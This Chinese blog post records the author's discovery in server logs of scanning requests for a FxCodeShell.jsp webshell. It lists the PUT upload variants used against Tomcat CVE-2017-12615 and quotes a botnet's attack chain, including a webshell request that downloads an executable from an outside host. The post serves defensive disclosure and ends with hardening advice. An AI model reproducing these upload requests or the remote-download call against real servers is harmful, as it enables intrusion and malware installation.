FxCodeShell Tomcat 漏洞攻击发现

最新推荐文章于 2024-05-12 15:57:02 发布
最新推荐文章于 2024-05-12 15:57:02 发布
阅读量6.4k 收藏 3
点赞数 1
分类专栏: 问题解决
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q1009020096/article/details/88392176
版权

攻击发现

在检查公网上的测试平台的日志时候先来自某个IP多个请求

在这里插入图片描述

通过PUT的方式访问,接口

	/FxCodeShell.jsp

攻击者通过扫描的方式服务运行端口上发起,4次请求
在这里插入图片描述
按时间顺序分别是:

GET 	/FxCodeShell.jsp

PUT /FxCodeShell.jsp::$DATA

PUT 	/FxCodeShell.jsp/

PUT 	/FxCodeShell.jsp%20

攻击手段

摘自 威胁警报:多个加密货币矿工僵尸网络开始利用新的ThinkPHP漏洞 . https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369

步骤 1: 用Tomcat PUT任意文件上传漏洞(CVE-2017-12615)
利用此漏洞上传名为FxCodeShell.jsp的webshel​​l,它可以下载和执行文件:

/FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&o

步骤2: Struts2远程代码执行漏洞(CVE-2017-5638)
步骤3: WebLogic WLS组件远程执行代码漏洞(CVE-2017-10271)
步骤4: EternalBlue漏洞(MS-17-010)
步骤5: ipc $暴力攻击(首先使用弱密码启动暴力攻击,然后使用Mimikatz提升权限)

请各位关闭无用的端口,限制WEB服务器上的路径匹配规则,防止攻击。

Cliven_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tomcat远程命令攻击漏洞与利用
05-05
内容原创。但是主要还是根据网上已有的思路去做的实验。这个文件比较详细,能够解决一般网上其他教程出现的问题。仅供学习。
Tomcat-8.5.28 无漏洞
03-05
Apache Tomcat的开发者们在发现此类漏洞后,会立即进行修复并发布新版本,比如这里的8.5.28。在升级到这个版本之后,用户可以确保他们的服务器免受此漏洞的威胁。通常,这种更新过程包括安装新的二进制文件或应用...
生产环境日志不知名访问路径记录
Say no to the bugs
05-21 9918
搭了个服务器,天天各种php脚本和不知名的路径访问,可能是搜索引擎,可能是漏洞攻击,在此记录一下. 告诉搜索过来的人,你不是一个人被这些路径骚扰过 顺便寻求一些解决办法,目前我使用了Spring boot Security,还请指教 我也是够闲的. 当然知道这些来自何方,也留言我更新一下,方便解惑 /login_sid.lua /hh.php /vuln.php /she.php /pe.php...
Tomcat漏洞之——通过PUT远程代码执行
明月阁
09-26 1万+
原文链接:http://www.dubby.cn/detail.html?id=9034 本文仅为技术分享,任何利用里技术的行为都和本文无关。 这是Tomcat在2017.9.19日公布的一个漏洞:根据邮件描述,我们下了windows版tomcat 7.0.79,安装成功后,需要首先允许tomcat进行PUT操作,也就是修改/conf/web.xml:<servlet> <ser
2024年网络安全最新技术分享 [POC编写]Apache Tomcat样例目录session操纵漏洞,【好文推荐】
最新发布
2401_84519859的博客
05-12 349
根据请求与响应信息进行填写,需注意响应测试内容想多添加内容需鼠标左键点击第一个group(根据需求进行增加)或单独编辑PoC文件添加。Goby安装目录\golib\exploits\user\English_name.json。名称不可填写中文,否则生成会出错,但后期可修改(只支持字母、数字、下划线)。根据内容填写就好,但要注意名称需英文,若需填写其它信息点击[高级配置]。通过火绒剑监控到PoC写入位置,为后期修改做准备。若漏洞危害使用中文编写,会导致解决方案显示异常。漏洞-PoC管理-自定义PoC。
社区发现算法(二)
热门推荐
I am not a quitter.
05-09 3万+
GN算法 本算法的具体内容请参考Finding and evaluating community structure in networks(Newman and Girvan)。 重要概念 边介数(betweenness):网络中任意两个节点通过此边的最短路径的数目。 GN算法的思想: 在一个网络之中,通过社区内部的边的最短路径相对较少,而通过社区之间的边的最短路径的数
关于xcode编译事件shell脚本问题
破楼兰
12-27 5470
vs里面许多时候需要用到编译事件脚本,能够极大提高工作效率。 xcode里面也有,只不过这次更加灵活。 build phases里面可以拖动phase执行的顺序,这样可以控制脚本的执行时间。 苹果的东西有时候设计的确实蛋疼,无意中才能发现新的功能,浪费时间。
shell实现把xcode打包的.app文件转换成.ipa文件
happymff的博客
11-17 1093
#!/bin/bash #appName定义应用的名称 appName="ettNextGen" rm -rf ${appName} mkdir ${appName} mkdir ${appName}/Payload cp -r ${appName}.app ${appName}/Payload/ettNextGen.app cp Icon.png ${appName}/
jspwebshell
走在左边
06-20 1851
[code="java"] =0) { strValue=(String)htParam.get(strKey); htShowMsg.put(strKey,strValue); } } } public String queryHashtable(String strKey) { strKey=(String)htPara...
tomcat漏洞处理.zip
05-15
1. **识别漏洞**:通过安全扫描工具或社区发布的安全公告发现潜在的漏洞。 2. **评估影响**:理解漏洞的严重程度,分析可能的攻击场景和对业务的影响。 3. **制定修复计划**:根据漏洞特性,制定针对性的修复策略,...
tomcat漏洞总结.rar
04-21
本文件包含Tomcat近几年爆发的4个严重漏洞,包含从tomcat弱口令上传,到tomcatPUT上传小马,本地权限提升一级反序列化漏洞,其中弱口令包含2本字典以及详细用法,PUT上传包含POC,反序列化和权限提升包含代码及详细...
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 幽灵猫getshell war包getshell 任意文件上传
webshell之复杂版本jsp
天元喜羊羊的博客
07-27 3594
从http://i8jesus.com/?page_id=205上下载的版本,感谢作者。 pwn.jsp: <%! String currentDir = ""; PageContext context; HttpSession currentSession; %> <% if ( session.getAttribute("pwd") == nu
什么是GN?
zhangtracy的专栏
01-12 9681
什么是GN?GN是一个生成Ninja构建文件的元构建系统,以便你可以用Ninja构建Chromium。你为什么从GYP切换?我们相信GN文件比GYP文件更具可读性和可维护性。GN很快:GN比GYP快20倍。GN支持作为构建的一部分,根据Ninja的需要自动重新运行。这消除了在更改构建文件时需要记住重新运行GN的必要性。GN为我们提供了更好的工具来执行依赖(见gn check和visibility,
jsp命令行页面-执行shell
落叶翩翩的CSDN博客
01-16 7974
看效果截图: jsp文件如下: 放在同一目录下,需要导入jquery,jquery版本最低1.7: cmd.jsp jsp命令行页面 textarea{ background-color: #000; color:red; width:100%; } 请输入命令: $(function(){ $("#cmd").keydown(functio
Xcode 6制作动态及静态Framework和各种坑
weixin_30765475的博客
06-11 357
Xcode 6制作动态及静态Framework http://www.cocoachina.com/ios/20141126/10322.html 有没有写SDK或者要将一些常用的工具类做成Framework的经历? 你或许自己写脚本完成了这项工作,相信也有很多的人使用 iOS-Universal-Framework ,随着Xcode 6的发布,相信小伙伴们已经都知道了,Xcode 6支持...
Apache Tomcat 问题漏洞
weixin_45816407的博客
08-08 1289
Apache Tomcat 环境问题漏洞(CVE-2022-42252)Apache Tomcat 信息泄露漏洞(CVE-2023-28708)建议直接升级tomcat的小版本,即就是升级到最新版本注:跨版本升级请自行百度。
关于 Xcode7网络请求的Http 协议改为 Https 协议的程序修改
wangbao1991的博客
11-20 1727
现在有的工程因为升级xcode7不能进行请求数据,新特性要求App内访问的网络必须使用HTTPS协议。但是现在公司的项目使用的是HTTP协议,使用私有加密方式保证数据安全。现在也不能马上改成HTTPS协议传输。 1. 2.把 Main.storyboard 删掉 3.在 Info.plist 里面 双击 Main 然后把 Main 删掉
关于Tomcat漏洞攻击
05-15
由于其广泛的使用,Tomcat漏洞攻击也是非常普遍的。 以下是一些可能导致Tomcat漏洞攻击的原因: 1.弱密码:如果您使用的是弱密码,攻击者可能会轻松地通过暴力破解攻击您的Tomcat服务器。 2.未打补丁的漏洞:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值